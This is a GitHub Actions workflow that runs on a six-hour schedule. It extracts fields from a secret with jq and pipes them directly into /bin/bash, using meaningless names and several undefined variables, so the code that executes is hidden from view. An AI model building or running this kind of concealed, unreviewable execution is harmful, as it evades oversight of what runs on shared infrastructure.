name: tianmingstm
on:
  workflow_dispatch:
  schedule:
    - cron: '5 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianmingstm
        env:
          a036: ${{ secrets.a036 }}
        run: |
          echo $a036 | jq -r .qxaaj877 | /bin/bash
          echo $oqj9739 | jq -r .x34835 | /bin/bash
          echo $iauy8 | jq -r .ax993 | /bin/bash
          echo $tdhva2 | jq -r .cfgji69031 | /bin/bash
          echo $kynsh1946 | jq -r .qzus2222 | /bin/bash
          echo $suwdc56 | jq -r .zuzlq1659 | /bin/bash

